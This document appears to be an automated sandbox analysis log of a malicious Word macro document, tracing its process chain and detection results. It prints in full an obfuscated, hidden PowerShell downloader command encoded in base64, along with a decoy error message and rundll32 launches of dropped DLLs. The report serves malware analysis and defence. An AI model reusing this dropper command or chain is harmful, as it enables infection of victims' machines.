                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.....................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.....................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.....................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....'...............N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....'................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....3...............N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....3................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....?...............N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....?................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....K...............N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....K................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....W...............N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....W................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....c...............N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....c................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....o...............N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....o................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....{...............N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....{................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.....................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.....................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.....................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.....................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.....................z.j......................u.............}..v............0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X$......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.....................z.j.....%................u.............}..v.....%......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X,......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.....................z.j.....-................u.............}..v.....-......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X4......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.....................z.j.....5................u.............}..v.....5......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................N{.j.....Ff...............u.............}..v....X<......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................z.j.....=................u.............}..v.....=......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................N{.j.....Ff...............u.............}..v....XD......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................z.j.....E................u.............}..v.....E......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................N{.j.....Ff...............u.............}..v....XL......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................z.j.....M................u.............}..v.....M......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................N{.j.....Ff...............u.............}..v....XT......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................z.j.....U................u.............}..v.....U......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................N{.j.....Ff...............u.............}..v....H\......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................z.j.....]................u.............}..v.....]......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............N{.j.....Ff...............u.............}..v....(d......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#................z.j.....d................u.............}..v....`e......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../...............N{.j.....Ff...............u.............}..v.....j......0.......................r.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../................z.j....hk................u.............}..v.....k......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;....... .......N{.j.....Ff...............u.............}..v....xo......0................Cf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;................z.j....0p................u.............}..v.....p......0...............HDf.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....E.................u.............}..v............0.................f.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....E.................u.............}..v....`9/.....0.................f.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.ini
                      Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll #1
                      Source: Info.docVirustotal: Detection: 69%
                      Source: Info.docReversingLabs: Detection: 56%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD 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
                      Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEUAMwBTAHkAIAAgAD0AIABbAFQAWQBQAEUAXQAoACIAewA0AH0AewAzAH0AewAwAH0AewAxAH0AewA1AH0AewAyAH0AIgAtAGYAJwBNAC4ASQBvAC4ARAAnACwAJwBpAFIAZQAnACwAJwBUAE8AUgBZACcALAAnAFMAdABlACcALAAnAHMAeQAnACwAJwBDACcAKQAgADsAIAAgAFMAZQBUAC0ASQBUAEUATQAgAFYAQQBSAEkAYQBiAEwARQA6AGkANwBSAHAAVgB6ACAAIAAoAFsAVABZAFAARQBdACgAIgB7ADEAfQB7ADQAfQB7ADIAfQB7ADAAfQB7ADYAfQB7ADMAfQB7ADcAfQB7ADUAfQAiAC0AZgAgACcARQBUAC4AUwBlAFIAVgBpACcALAAnAFMAJwAsACcAVABFAG0ALgBOACcALAAnAEkATgBUACcALAAnAHkAUwAnACwAJwBBAG4AQQBnAEUAcgAnACwAJwBDAGUAUABvACcALAAnAE0AJwApACkAIAAgADsAJABYAHMAZQBqAGoAbwBvAD0AKAAnAE4AJwArACgAJwBhAHYAYwAnACsAJwBsAGcAJwApACsAJwB1ACcAKQA7ACQAUwBsAGYAcgAxAGcAcAA9ACQAUgBwAGIANQA2AHQANAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAVQA5AG4AeQBiAGoAcwA7ACQAVwB3AHUAaABjAGYAcwA9ACgAKAAnAFUAXwBtACcAKwAnADQAawAnACkAKwAnAHAAcQAnACkAOwAgACAAKABnAEUAVAAtAHYAQQBSAEkAYQBCAGwAZQAgACAAZQAzAHMAWQAgAC0AdgBBAGwAVQBlAE8AbgAgACkAOgA6ACIAQwBSAGUAYQBUAEUARABpAHIAZQBgAGMAYABUAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWQAnACsAJwBiACcAKwAnAHMAUgAnACsAKAAnAGcAMAA2ADQAJwArACcANgByAFkAYgBzACcAKwAnAFEAJwArACcAOQAnACkAKwAoACcAMAB4AG0AJwArACcAcgBxACcAKwAnAFkAYgAnACkAKwAnAHMAJwApACAAIAAtAFIARQBQAGwAYQBDAGUAIAAoACcAWQAnACsAJwBiAHMAJwApACwAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQASwAzADAAOQBxAHcAMQA9ACgAKAAnAFIAcQAnACsAJwByAG0AJwApACsAKAAnAGIAMgAnACsAJwA4ACcAKQApADsAIAAoACAATABzACAAIAB2AGEAcgBpAEEAYgBsAGUAOgBpADcAcgBQAHYAWgAgACkALgB2AGEATABVAGUAOgA6ACIAUwBFAGMAVQByAGkAYABUAFkAcABSAG8AYABUAE8AYwBgAG8AbAAiACAAPQAgACgAKAAnAFQAbABzACcAKwAnADEAJwApACsAJwAyACcAKQA7ACQATgBtAGgAMQB3AG0AZgA9ACgAKAAnAFgAMwBiADYAJwArACcAZwAnACkAKwAnAGEAJwArACcAbwAnACkAOwAkAE8AagB6AF8AdwBhADcAIAA9ACAAKAAnAE0AJwArACgAJwA4AGoAawBsACcAKwAnAHYANAAnACkAKQA7ACQAWABnAHQAdwB6AGcAaAA9ACgAKAAnAEMAYwAnACsAJwBrADAAaAAnACkAKwAnADEANgAnACkAOwAkAFEAcQBhAHkAdQA2AGgAPQAoACcAQgAnACsAKAAnAGUANgAnACsAJwBmACcAKQArACgAJwByACcAKwAnAHcAMAAnACkAKQA7
ACQASgBkAGcAegBhADUAbwA9ACQASABPAE0ARQArACgAKAAnAHsAMAAnACsAJwB9AFIAZwAwADYANAA2AHIAJwArACcAewAnACsAJwAwAH0AUQA5ADAAJwArACcAeABtAHIAcQB7ACcAKwAnADAAfQAnACkAIAAtAEYAIAAgAFsAQwBoAEEAUgBdADkAMgApACsAJABPAGoAegBfAHcAYQA3ACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQATgAwADUAcQA1AHQANQA9ACgAJwBPACcAKwAoACcAXwAnACsAJwAzACcAKwAnAGUAMgBwAGYAJwApACkAOwAkAEcAawBoAG0AMQB0AGcAPQBuAGUAVwAtAE8AYgBgAGoAYABFAEMAVAAgAE4AZQBUAC4AVwBFAEIAQwBsAGkAZQBOAHQAOwAkAEoAawBkAHkAcwAwAG8APQAoACgAKAAoACcAaAB0ACcAKwAnAHQAJwArACcAcAA6AEoAJwArACcAKQAoADMAcwAyACkAJwApACkAKwAoACcAKAAnACsAJwBKACkAKAAzAHMAMgAnACsAJwApACcAKQArACgAKAAnACgAegBoACcAKwAnAG8AJwApACkAKwAoACcAbgBnAHMAJwArACcAaAAnACsAJwBpAHgAaQBuAGcAYwAnACsAJwBoAHUAYQAnACkAKwAoACcAbgAnACsAJwBnAC4AJwApACsAJwBjACcAKwAnAG8AbQAnACsAKAAoACcASgApACgAMwBzADIAJwArACcAKQAnACkAKQArACcAKAAnACsAJwB3AHAAJwArACgAJwAtACcAKwAnAGEAZABtAGkAbgBKACcAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAJwApACkAKwAoACgAJwAoAE8AVABtAEoAJwArACcAKQAoACcAKwAnADMAcwAnACsAJwAyACkAKABAACcAKQApACsAKAAnAGgAdAAnACsAJwB0ACcAK
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll #1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll #1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bjbj\rqtl.dgq',RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Frxh\ggkviq.cnk',RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zgwl\aiycp.wss',RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cqxs\necppp.cgm',RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oxpl\fwcrxow.muo',RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pnjy\rwrr.fge',RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaqt\yasnhb.kgm',RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hudb\deul.ebq',RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ohxf\pnwx.dib',RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jpux\rkm.xqv',RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oxtv\rmjj.sjq',RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pwzo\iducd.mjn',RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfwk\bavnhqr.pvy',RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dbsb\hxixh.nee',RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yvvm\ving.mzt',RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Puve\yoqqjfh.eoi',RunDLL
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll #1
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll #1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bjbj\rqtl.dgq',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Frxh\ggkviq.cnk',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zgwl\aiycp.wss',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cqxs\necppp.cgm',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oxpl\fwcrxow.muo',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pnjy\rwrr.fge',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaqt\yasnhb.kgm',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hudb\deul.ebq',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ohxf\pnwx.dib',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jpux\rkm.xqv',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oxtv\rmjj.sjq',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pwzo\iducd.mjn',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfwk\bavnhqr.pvy',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dbsb\hxixh.nee',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yvvm\ving.mzt',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Puve\yoqqjfh.eoi',RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWindow found: window name: SysTabControl32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2095683883.0000000001E27000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2095683883.0000000001E27000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2095683883.0000000001E27000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2095683883.0000000001E27000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2095683883.0000000001E27000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2095755658.0000000002080000.00000002.00000001.sdmp
                      Source: Info.docInitial sample: OLE summary subject = Granite Kids & Beauty Director portals interface well-modulated white Web robust Wyoming Lodge database action-items

                      Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
                      Source: Info.docStream path 'Macros/VBA/E2ajbo3kwzka_d5z' : High number of GOTO operations
                      Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module E2ajbo3kwzka_d5z
PowerShell case anomaly found
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD 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
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEUAMwBTAHkAIAAgAD0AIABbAFQAWQBQAEUAXQAoACIAewA0AH0AewAzAH0AewAwAH0AewAxAH0AewA1AH0AewAyAH0AIgAtAGYAJwBNAC4ASQBvAC4ARAAnACwAJwBpAFIAZQAnACwAJwBUAE8AUgBZACcALAAnAFMAdABlACcALAAnAHMAeQAnACwAJwBDACcAKQAgADsAIAAgAFMAZQBUAC0ASQBUAEUATQAgAFYAQQBSAEkAYQBiAEwARQA6AGkANwBSAHAAVgB6ACAAIAAoAFsAVABZAFAARQBdACgAIgB7ADEAfQB7ADQAfQB7ADIAfQB7ADAAfQB7ADYAfQB7ADMAfQB7ADcAfQB7ADUAfQAiAC0AZgAgACcARQBUAC4AUwBlAFIAVgBpACcALAAnAFMAJwAsACcAVABFAG0ALgBOACcALAAnAEkATgBUACcALAAnAHkAUwAnACwAJwBBAG4AQQBnAEUAcgAnACwAJwBDAGUAUABvACcALAAnAE0AJwApACkAIAAgADsAJABYAHMAZQBqAGoAbwBvAD0AKAAnAE4AJwArACgAJwBhAHYAYwAnACsAJwBsAGcAJwApACsAJwB1ACcAKQA7ACQAUwBsAGYAcgAxAGcAcAA9ACQAUgBwAGIANQA2AHQANAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAVQA5AG4AeQBiAGoAcwA7ACQAVwB3AHUAaABjAGYAcwA9ACgAKAAnAFUAXwBtACcAKwAnADQAawAnACkAKwAnAHAAcQAnACkAOwAgACAAKABnAEUAVAAtAHYAQQBSAEkAYQBCAGwAZQAgACAAZQAzAHMAWQAgAC0AdgBBAGwAVQBlAE8AbgAgACkAOgA6ACIAQwBSAGUAYQBUAEUARABpAHIAZQBgAGMAYABUAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWQAnACsAJwBiACcAKwAnAHMAUgAnACsAKAAnAGcAMAA2ADQAJwArACcANgByAFkAYgBzACcAKwAnAFEAJwArACcAOQAnACkAKwAoACcAMAB4AG0AJwArACcAcgBxACcAKwAnAFkAYgAnACkAKwAnAHMAJwApACAAIAAtAFIARQBQAGwAYQBDAGUAIAAoACcAWQAnACsAJwBiAHMAJwApACwAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQASwAzADAAOQBxAHcAMQA9ACgAKAAnAFIAcQAnACsAJwByAG0AJwApACsAKAAnAGIAMgAnACsAJwA4ACcAKQApADsAIAAoACAATABzACAAIAB2AGEAcgBpAEEAYgBsAGUAOgBpADcAcgBQAHYAWgAgACkALgB2AGEATABVAGUAOgA6ACIAUwBFAGMAVQByAGkAYABUAFkAcABSAG8AYABUAE8AYwBgAG8AbAAiACAAPQAgACgAKAAnAFQAbABzACcAKwAnADEAJwApACsAJwAyACcAKQA7ACQATgBtAGgAMQB3AG0AZgA9ACgAKAAnAFgAMwBiADYAJwArACcAZwAnACkAKwAnAGEAJwArACcAbwAnACkAOwAkAE8AagB6AF8AdwBhADcAIAA9ACAAKAAnAE0AJwArACgAJwA4AGoAawBsACcAKwAnAHYANAAnACkAKQA7ACQAWABnAHQAdwB6AGcAaAA9ACgAKAAnAEMAYwAnACsAJwBrADAAaAAnACkAKwAnADEANgAnACkAOwAkAFEAcQBhAHkAdQA2AGgAPQAoACcAQgAnACsAKAAnAGUANgAnACsAJwBmACcAKQArACgAJwByACcAKwAnAHcAMAAnACkAKQA7
